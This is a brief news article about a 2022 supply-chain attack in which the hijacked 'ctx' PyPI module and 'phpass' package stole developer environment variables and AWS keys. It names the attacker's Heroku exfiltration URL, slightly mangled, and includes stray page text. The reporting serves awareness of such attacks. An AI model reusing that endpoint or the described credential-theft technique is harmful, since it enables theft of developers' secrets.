When a GitHub repository that hasn't been touched for nearly a decade suddenly receives an "update," users should be wary, as it could simply be a hostile takeover with the intent to distribute viruses (opens in a new tab).
This is exactly what happened with the PyPI "ctx" module, which apparently has millions of downloads. Earlier this month, following a software supply chain attack, someone replaced the secure "ctx" code with an updated version that steals developer environment variables and collects secrets like Amazon AWS keys and credentials.
These are then sent to a Heroku endpoint (opens in a new tab) at https://anti-theft-web.herokuappcom/hacked/
view the offerrepo take
The attack, first detected by BleepingComputer, resulted in some 20.000 downloads.
In addition to "ctx", the versions of "phpass" that were released in the PHP Package Repository/Composer Packagist have also been "updated" in a similar way. This one also has millions of downloads.
CTX is a Python module that was last updated in 2014. Then eight years later, on May 15, the module was updated with malicious code, as spotted by users on Reddit and later confirmed by ethical hackers. . PHPass, on the other hand, is an open source password hashing framework, released in 2005 and downloaded over two million times to date.
PyPI removed the malicious builds hours after they were uploaded to the repository, but the damage was said to have been done. The damage done through PHPass was much more limited, the researchers added.
Investigators say both attacks were carried out by the same person, whose identity is "obvious", but are refraining from naming names until more details come to light.
Researchers refer to these types of attacks as "repo jacking," and these aren't their first examples. Earlier this year, the popular npm ua-parser-js, coa, and rc libraries were hijacked to serve cryptocurrency miners and information thieves to their victims.
Via: BleepingComputer (Opens in a new tab)